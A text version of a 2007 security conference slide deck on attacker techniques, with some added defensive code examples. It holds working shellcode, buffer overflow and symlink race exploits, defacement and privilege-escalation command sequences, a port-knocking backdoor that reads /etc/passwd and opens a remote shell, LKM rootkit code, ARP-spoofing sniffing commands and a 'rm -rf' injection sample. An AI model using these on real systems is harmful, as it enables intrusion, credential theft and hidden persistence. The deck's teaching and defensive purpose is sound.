Hacking Techniques (page 2)

Gaining Access

-- Buffer Overflow --
➤ Stack Based Buffer Overflows
➤ Off-by-One Overflows
➤ Frame Pointer Overwrites
➤ BSS Overflows
➤ Heap Overflows
01./02.02.2007 linuxdays.lu 2007 44
Gaining Access
-- Stack Based Buffer Overflow --
➤ C/C++ problem
➤ programming error
➤ copying too much variable-length user input into a fixed-size buffer

    #include <stdio.h>
    int main()
    {
        char name[31];
        printf("Please type your name: ");
        gets(name);                /* no bounds check: reads until newline */
        printf("Hello, %s", name);
        return 0;
    }

A buffer overflow occurs if you enter, for example (40 characters into a 31-byte buffer):
`1234567890123456789012345678901234567890`
Gaining Access
-- Stack Based Buffer Overflow --
Exploitation:
-- missing bounds checking
-- multiple "unsafe" functions in libc
-- executing code in the data/stack segment
-- crafting the input that is fed to the application
Memory layout of a process (low addresses at the top, high addresses at the bottom):
-- Code: 'read-only' attribute
-- Data
-- BSS
-- Heap
-- Stack: LIFO, top of the stack
-- Data/Stack: no 'execution' attribute set (so code placed there can be executed)
Gaining Access
-- Stack Based Buffer Overflow --
-- the stack holds all the information for the function
-- a stack frame is created at the beginning of a function
-- the stack frame is released at the end of a function
-- LIFO mechanism to pass arguments to functions and to reference local variables

    void
    function (char *args)
    {
        [ ... ]
    }

    int
    main (int argc, char *argv[])
    {
        int a;
        function (argv[1]);
        [ ... ]
    }

Stack (figure): Frame 1 (main) below Frame 2 (function); EBP points to the base of the current frame, ESP to the top of the stack; PUSH and POP move ESP. Each frame holds:
- function parameters
- local variables
- data to recover the previous frame
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
Gaining Access
-- Stack Based Buffer Overflow --

    #include <stdio.h>
    #include <string.h>

    void
    function (char *args)
    {
        char buff[512];
        strcpy (buff, args);     /* no length check on args */
    }

    int
    main (int argc, char *argv[])
    {
        if (argc > 1)
        {
            function (argv[1]);
        } else
            printf ("no input\n");
        return 0;
    }

Stack (figure), Frame 1 = main (), Frame 2 = function (), built up in this order:
1. args (function parameter)
2. Return Address (saved EIP)
3. SFP (saved frame pointer, the caller's EBP)
4. saved registers, then the local variables: buff[512]
EBP points to the SFP of the current frame, ESP to its top (the last local variable).
EIP: Extended Instruction Pointer
EBP: Extended Base Pointer
ESP: Extended Stack Pointer
Gaining Access
-- Stack Based Buffer Overflow --
(same program as on the previous slide)
Stack (figure), step 5: strcpy () fills buff[512] from its low end upwards. With an args longer than 512 bytes the copy keeps going past the end of the buffer, over the saved registers, the SFP and finally the Return Address of function ().
Steps 4 to 6: the slot that held the Return Address now contains bytes taken from args, so when function () returns, EIP is loaded with that value instead of the address inside main (): a "Wrong Return".
Gaining Access
-- Stack Based Buffer Overflow --
(same program as above)
Stack (figure) with addresses: buff[512] starts at 0x0800. The over-long args writes a run of nop instructions, the shellcode (around 0x0C00) and then the address 0x0A00 repeated several times. One of those copies lands on the Return Address, so function () returns to 0x0A00, inside the nop run, and execution slides forward into the shellcode.
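Defensive counterpart of the gets()/strcpy() programs on slides 45 to 51, added here and not part of the original deck: the same 31-byte name buffer, but both the copy and the line read are bounded, so the 40-character input from slide 45 is rejected instead of running over the saved frame pointer and return address. The names copy_bounded and read_name are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define NAME_SIZE 31   /* same fixed-size buffer as the slide's example */

/* Bounded replacement for strcpy (buff, args): copies src only if it fits,
 * terminating NUL included. Returns 0 on success, -1 if src is too long;
 * on failure nothing is written, so dst can never be overrun. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    const char *end = memchr(src, '\0', dstsz);   /* look no further than dstsz */
    if (end == NULL)
        return -1;                  /* src needs dstsz bytes or more */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Bounded replacement for gets (name): reads one line with fgets.
 * Returns 0 on success, -1 on EOF/error, -2 if the line did not fit; in the
 * -2 case the rest of the over-long line is discarded and name is emptied. */
int read_name(FILE *in, char *name, size_t namesz)
{
    if (fgets(name, (int)namesz, in) == NULL)
        return -1;
    size_t len = strlen(name);
    if (len > 0 && name[len - 1] == '\n') {
        name[len - 1] = '\0';       /* strip the newline */
        return 0;
    }
    int c = getc(in);               /* no newline: did the line end here? */
    if (c == EOF || c == '\n')
        return 0;                   /* it fit exactly */
    while (c != EOF && c != '\n')
        c = getc(in);               /* discard the overflowing remainder */
    name[0] = '\0';
    return -2;
}

int main(void)
{
    char name[NAME_SIZE];
    printf("Please type your name: ");
    if (read_name(stdin, name, sizeof name) != 0) {
        fprintf(stderr, "name must be at most %d characters\n", NAME_SIZE - 1);
        return 1;
    }
    printf("Hello, %s\n", name);
    return 0;
}
```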
Gaining Access
-- Shellcode --

    char linux_ia32_shellcode[]=
        "\x31\xc0"       /* xorl %eax,%eax */
        "\x50"           /* pushl %eax */
        "\x68""//sh"     /* pushl $0x68732f2f */
        "\x68""/bin"     /* pushl $0x6e69622f */
        "\x89\xe3"       /* movl %esp,%ebx */
        "\x50"           /* pushl %eax */
        "\x53"           /* pushl %ebx */
        "\x89\xe1"       /* movl %esp,%ecx */
        "\x99"           /* cdq */
        "\xb0\x0b"       /* movb $0x0b,%al */
        "\xcd\x80";      /* int $0x80 */

Old school payload: bindshell, backconnect
Gaining Access
-- Exercise: Web Site defacement --

    $ cd /home/hamm/ssl/
    $ ls -la
    $ ./openSSL 0x73 192.168.22.21 443 -c 40
    /usr/bin/whoami
    echo "hacked by me….. " > /var/www/html/index.html

- we are an unprivileged user -> local privilege escalation
What do we see on the firewall?
Gaining Access
primary target: the webserver
-- why they are so vulnerable --
➤ complex application
➤ multiple subsystems: application server, scripts, SQL server
➤ self-made applications: programmers don't know how to write secure code
➤ shell command injection: smuggling extra commands through the shell
  Input: "Alice; rm -rf"
➤ SQL injection: smuggling SQL commands in via user input
  Input: "User=Alice' -&Pass=Idontknow"
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Maintaining Access
-- be silent --
➤ after a successful initial attack:
➤ hide the tracks in the logfiles
➤ expand local rights; find vulnerabilities in the network
➤ install rootkits, steal the password database, start a network sniffer
➤ try the same password on other systems
➤ find problems in the topology (e.g. dual-homed hosts)
➤ try to attack the private network
Maintaining Access
Privilege Escalation
-- Race Condition --
what could I try to attack?
- SUID / SGID binaries
    find / -perm -4000 -type f -user root -print
    find / -perm -2000 -type f -group root -print
- privileged processes
- the kernel
- the password file
Source of problems?
- configuration errors
- local software vulnerabilities
-- buffer overflow
-- race condition
-- format string
Maintaining Access
Privilege Escalation
-- example: race_bug --

    #include <stdio.h>
    #include <unistd.h>
    int
    main (int argc, char *argv[])
    {
        char path[] = "/tmp/race.txt";  /* fixed, predictable name in a world-writable directory */
        FILE *fp;
        if (argc < 2)
            return 1;
        fp = fopen (path, "a+");         /* opens whatever /tmp/race.txt is, e.g. a symlink */
        if (fp == NULL)
            return 1;
        fprintf (fp, "%s\n", argv[1]);
        fclose (fp);
        unlink (path);
        return 0;
    }
Maintaining Access
Privilege Escalation
-- example: race_bug --
Prepare attack

    $ cd /home/hamm/race
    $ ls -la
    $ ./race_bug test
    $ ls -la /tmp
    $ cat /etc/passwd
    $ su -; cp /etc/passwd /etc/passwd.bak; exit

Attack:

    $ ln -s /etc/passwd /tmp/race.txt
    $ ls -la /tmp
    $ cat command
    $ ./command
    $ ls -la /tmp
    $ cat /etc/passwd
    $ su - bimbam
    # id
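Hardened version of race_bug, added here as an example and not taken from the deck: instead of fopen (path, "a+"), which follows a symlink planted at /tmp/race.txt, the file is created with O_EXCL|O_NOFOLLOW, so a pre-existing name of any kind makes open() fail and there is no check-then-use window to race. A fixed name in /tmp remains a weak design; a private directory or mkstemp() is the fuller fix. The function name append_line_exclusive is this example's own.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Append one line to a brand-new file at path, refusing any name that
 * already exists. O_EXCL makes open() fail with EEXIST when the name is
 * present, and POSIX requires this for a symbolic link regardless of what
 * it points to, so /tmp/race.txt -> /etc/passwd is never followed.
 * O_NOFOLLOW is a second, independent refusal of symlinks.
 * Returns 0 on success, -1 with errno set on failure. */
int append_line_exclusive(const char *path, const char *line)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    size_t len = strlen(line);
    int rc = 0;
    if (write(fd, line, len) != (ssize_t)len || write(fd, "\n", 1) != 1)
        rc = -1;
    if (close(fd) != 0)
        rc = -1;
    return rc;
}

/* The slide's race_bug with the unsafe fopen (path, "a+") replaced. */
int main(int argc, char *argv[])
{
    const char path[] = "/tmp/race.txt";
    if (argc < 2) {
        fprintf(stderr, "usage: %s text\n", argv[0]);
        return 1;
    }
    if (append_line_exclusive(path, argv[1]) != 0) {
        perror(path);          /* EEXIST: the name was pre-created or linked */
        return 1;
    }
    unlink(path);
    return 0;
}
```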
Maintaining Access
Privilege Escalation
-- Exercise: privilege escalation --

    $ su -
    # cd /home/hamm/ssl/
    # ls -la
    # cp p /tftpboot
    # /etc/init.d/atftpd start
    # exit
    $ ./openSSL 0x73 192.168.22.21 443 -c 40
    /usr/bin/whoami
    pwd
    /usr/bin/tftp 192.168.22.1
    mode binary          # local root exploit
    get p                # kernel 2.2.x 2.4.x
    quit
    ls -l
    chmod +x p
    ls -l
    ./p
    whoami
Maintaining Access
Port Knocking
-- introduction --
aka Port Knocking Back Door
- open port? none:
- no promiscuous mode, no open ports
- raw sockets
- a trigger sequence of special packets activates it
- attacker:
-- send trigger packet 1
-- send trigger packet 2
-- send trigger packet 3
-- send command packet 1
- example: Sadoor
http://cmn.listptojects.darklab.org
Port 80, 443 open; stateful
Maintaining Access
Port Knocking
-- Sadoor example --
Sadoor daemon configuration: /etc/sadoor/sadoor.pkts

    # key 1
    keypkt
    {
        ip {
            daddr = 192.168.22.24;
            saddr = 192.168.22.1;
            icmp {
                type = 8;
            }
        }
    }
    # key 2
    keypkt
    {
        ip {
            daddr = 192.168.22.24;
            saddr = 192.168.22.1;
            tcp {
                flags = SYN;
                dport = 80;
                sport = 3456;
            }
        }
    }
    # key 3
    keypkt
    {
        ip {
            daddr = 192.168.22.24;
            saddr = 192.168.22.1;
            udp {
                dport = 111;
                data { bim\x20bam }
            }
        }
    }
    # command
    cmdpkt
    {
        ip {
            daddr = 192.168.22.24;
            saddr = 192.168.22.1;
            tcp {
                sport = 80;
                sport = 12345;
            }
        }
    }
Maintaining Access
Port Knocking
-- Sadoor example --
Create a config-image database and download it to /home/hamm/.sash

    mksadb
    mv sadoor.db /var/www/html/
    chmod 644 /var/www/html/sadoor.db

Run the daemon

    /usr/sbin/sadoor

Review logging

    tail -f /etc/sadoor/sadoor.log
Maintaining Access
Port Knocking
-- Sadoor example --
ON CLIENT side:
1. Download http://testwww.mumm.lu/sadoor.db
2. become root

    cd
    cd .sash
    mv /home/hamm/sadoor.db .
    sadbcat sadoor.db sash.db    # create encrypted db
    rm -f sadoor.db              # delete plain sequence

3. Sending commands

    sash 192.168.22.24 \
        -vv -r "cat /etc/passwd > /var/www/html/test.txt"
    sash 192.168.22.24 "chmod 644 /var/www/html/test.txt"

4. Establish a connection / remote shell

    sash 192.168.22.24 -vv
    sh-2.05b# whoami
    sh-2.05b# /sbin/ifconfig
    sh-2.05b# exit
Hacking Techniques
1. Reconnaissance
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Clearing Tracks
Clearing Tracks
Rootkits
-- introduction --
Main goals of a rootkit:
- hide the attacker's activities from the legitimate administrator:
-- active processes
-- directories & files
-- network activities
- provide a backdoor to the system
- let the attacker become root whenever he wants
- collect sensitive data
-- from the network
-- from user input
Clearing Tracks
Rootkits
-- introduction --
1st generation: Binary Rootkits
- replace important system tools with modified versions:
-- du(1), locate(1), netstat(1), ps(1), top(1),
-- ifconfig(1), w(1), who(1), …
- defined parameters become invisible from then on:
-- IP addresses
-- directories & files
-- usernames
- easy to discover:
-- by a filesystem integrity checker: tripwire, aide
- examples: lrk3-6 (Linux), Fbrk (FreeBSD), Solaris Rootkit
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- extend the functionality of the kernel
- can be loaded dynamically: insmod(3), rmmod(3)
- implemented as a device driver
-> high level of flexibility
- implementations:
-- new modules
-- infecting existing modules
- result: trojaned kernel -> full control over all userland apps
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- syscalls: the gate between userland and kernel
- example of syscalls: strace /bin/ls

    execve(…
    uname(…
    brk(0)
    old_mmap(…
    access(…
    open(…
    open(…
    …
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM (Loadable Kernel Modules) Rootkits
- normal syscall (figure), example: mkdir
  Userland: parameters into registers, int 80
  Interrupt Descriptor Table (IDT): selection of the interrupt handler
  Kernel, interrupt handler: syscall selection via the Syscall Table
  -> exec syscall mkdir
- manipulated syscall (figure), example: mkdir
  the same path, but the Syscall Table entry for mkdir now points at the rootkit's code
  -> exec syscall: manipulated mkdir
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM Rootkit: Exercise: mkdir_Rootkit

    #define MODULE
    #define __KERNEL__

    #include <linux/module.h>
    #include <linux/version.h>
    #include <linux/kernel.h>
    #include <sys/syscall.h>
    #include <stdio.h>

    MODULE_LICENSE("GPL");

    /* import syscall table */
    extern void *sys_call_table[];

    /* dummy for old mkdir syscall */
    int (*orig_mkdir) (const char *path);

    /* the new mkdir syscall */
    int hack_mkdir (const char *path) {
        printk ("BimBam!\n");
        return 0;
    }

    int init_module (void) {
        orig_mkdir=sys_call_table[SYS_mkdir];
        sys_call_table[SYS_mkdir]=hack_mkdir;
        return 0;
    }

    void cleanup_module (void) {
        sys_call_table[SYS_mkdir]=orig_mkdir;   /* restore the original entry on rmmod */
    }
Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM Rootkit: Exercise: mkdir_Rootkit

    cd /root/rootkit/mkdir
    gcc -c -I /usr/src/linux/include mkdir.c
    insmod mkdir.o
    lsmod
    mkdir test
    ls -la
    cat /var/log/messages
    rmmod mkdir
    lsmod
    mkdir test
    ls -la

Clearing Tracks
Rootkits
-- introduction --
2nd generation: LKM Rootkit: Adore

    cd /root/rootkit/adore/
    insmod adore.o
    lsmod
    insmod cleaner.o
    lsmod
    rmmod cleaner
    lsmod
    ps aux | grep ssh
    ./ava i <PID SSHD>
    ps aux | grep ssh
    netstat -punta | grep 22
    mkdir /root/rootkit/bimbam
    ./ava h /root/rootkit/bimbam
    ls -la /root/rootkit
    ./ava -U dummy
Clearing Tracks
Rootkits
-- introduction --
3rd generation: VFS (Virtual File System) Layer Rootkits
- sys_call_table is not exported anymore:
-- Red Hat 8.0 (Kernel 2.4.18)
-- Kernel 2.5.41 and later
- all syscalls that access the filesystem go through the Virtual File System
- in Unix, almost everything is handled like a file
- existing handler routines are replaced by modified ones
-> files/folders can be hidden
-> processes can be hidden via /proc
Clearing Tracks
Rootkits
-- introduction --
3rd generation: VFS (Virtual File System) Layer Rootkit (figure)
  Userland: parameters into registers, int 80
  Interrupt Descriptor Table (IDT): selection of the interrupt handler
  Kernel, interrupt handler: syscall selection via the Syscall Table
  -> syscall -> VFS -> ext2/ext3/...
  the rootkit hooks in at the VFS layer, below the untouched Syscall Table
Hacking Techniques
Insider Attacks
Insider Attacks
-- Password Sniffing through a Switch --
Figure:
- Default Gateway: IP 10.10.10.1, MAC 11:11:11:11:11:11
- Attacker: IP 10.10.10.99, MAC 99:99:99:99:99:99
- Attacked PC: IP 10.10.10.2, MAC 22:22:22:22:22:22
The attacker sends the attacked PC: ARP Reply "IP 10.10.10.1 is at MAC 99:99:99:99:99:99"
No gratuitous ARP, BUT a directed ARP:

    ETHERNET II
        Dst: 22:22:22:22:22:22
        Src: 99:99:99:99:99:99
    ARP reply:
        Sender IP addr: 10.10.10.1
        Sender MAC addr: 99:99:99:99:99:99
Insider Attacks
-- Password Sniffing through a Switch --
Figure:
- Telnet Client: IP 192.168.3.3 / IP: ___.___.___.___
- Telnet Server: IP 192.168.3.4 / IP: ___.___.___.___
- Attacker: IP 192.168.3.2, MAC 00:08:74:B3:BB:F1 / IP: ___.___.___.___ MAC: __:__:__:__:__:__
Exercise:
1. echo 1 > /proc/sys/net/ipv4/ip_forward
2. arpspoof -i eth0 -t 192.168.4.30 192.168.4.28
3. dsniff -cn
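The detection side of slides 80 and 81, added here as an example that is not part of the original deck: a function that parses a raw Ethernet/ARP frame and flags a reply claiming a trusted IP (the slide's gateway 10.10.10.1, 11:11:11:11:11:11) from a different MAC, which is the check an arpwatch-style monitor performs on every ARP frame it sees. The trusted table and the sample frame are constructed from the slide's figure; the names arp_reply_is_spoofed and spoofed_reply are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ETH_HDR_LEN   14
#define ARP_LEN       28        /* Ethernet/IPv4 ARP body */
#define ARP_ETHERTYPE 0x0806

struct known_host { uint8_t ip[4]; uint8_t mac[6]; };

/* IP -> MAC pairs the monitor trusts; here the slide's Default Gateway. */
static const struct known_host trusted[] = {
    { {10, 10, 10, 1}, {0x11, 0x11, 0x11, 0x11, 0x11, 0x11} },
};

/* Returns 1 if frame is an ARP reply whose sender IP is a trusted host but
 * whose sender MAC differs from the trusted one (ARP cache poisoning),
 * 0 for anything else (non-ARP, request, unknown IP, matching MAC, short). */
int arp_reply_is_spoofed(const uint8_t *frame, size_t len)
{
    if (len < ETH_HDR_LEN + ARP_LEN)
        return 0;
    if (((frame[12] << 8) | frame[13]) != ARP_ETHERTYPE)
        return 0;
    const uint8_t *arp = frame + ETH_HDR_LEN;
    /* htype 1 (Ethernet), ptype 0x0800 (IPv4), hlen 6, plen 4, opcode 2 (reply) */
    if (arp[0] != 0 || arp[1] != 1 || arp[2] != 0x08 || arp[3] != 0x00 ||
        arp[4] != 6 || arp[5] != 4 || arp[6] != 0 || arp[7] != 2)
        return 0;
    const uint8_t *sender_mac = arp + 8;
    const uint8_t *sender_ip  = arp + 14;
    for (size_t i = 0; i < sizeof trusted / sizeof trusted[0]; i++)
        if (memcmp(sender_ip, trusted[i].ip, 4) == 0)
            return memcmp(sender_mac, trusted[i].mac, 6) != 0;
    return 0;
}

/* Constructed sample: the directed ARP reply from slide 80, 10.10.10.1
 * claimed by 99:99:99:99:99:99 and unicast to the attacked PC. */
const uint8_t spoofed_reply[ETH_HDR_LEN + ARP_LEN] = {
    0x22, 0x22, 0x22, 0x22, 0x22, 0x22,     /* Ethernet dst: attacked PC  */
    0x99, 0x99, 0x99, 0x99, 0x99, 0x99,     /* Ethernet src: attacker     */
    0x08, 0x06,                             /* ethertype ARP              */
    0x00, 0x01, 0x08, 0x00, 0x06, 0x04,     /* Ethernet, IPv4, 6, 4       */
    0x00, 0x02,                             /* opcode 2 = reply           */
    0x99, 0x99, 0x99, 0x99, 0x99, 0x99,     /* sender MAC (the lie)       */
    10, 10, 10, 1,                          /* sender IP: the gateway's   */
    0x22, 0x22, 0x22, 0x22, 0x22, 0x22,     /* target MAC: attacked PC    */
    10, 10, 10, 2,                          /* target IP: attacked PC     */
};
```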
Insider Attacks
SSH MitM Attack
-- by DNS Spoofing --
Figure:
- SSH Server: IP 192.168.3.3
- DNS Server: IP 158.64.4.
- Default Gateway: IP 192.168.3.1
- Attacker: IP 192.168.3.2
- Target, SSH Client: IP 192.168.3.xx
Exchange: the SSH client sends DNS Query (HOST: server_xyz.lu); the attacker answers with DNS Response (server_xyz.lu, 192.168.3.2), pointing the client at the attacker's own address.
Hacking for Admins
by
Shankha {Fainted Brain}

Comment by chaitan (Sep 29 2007, 10:27 PM EDT): Can you tell me in a more detailed manner where to use these commands?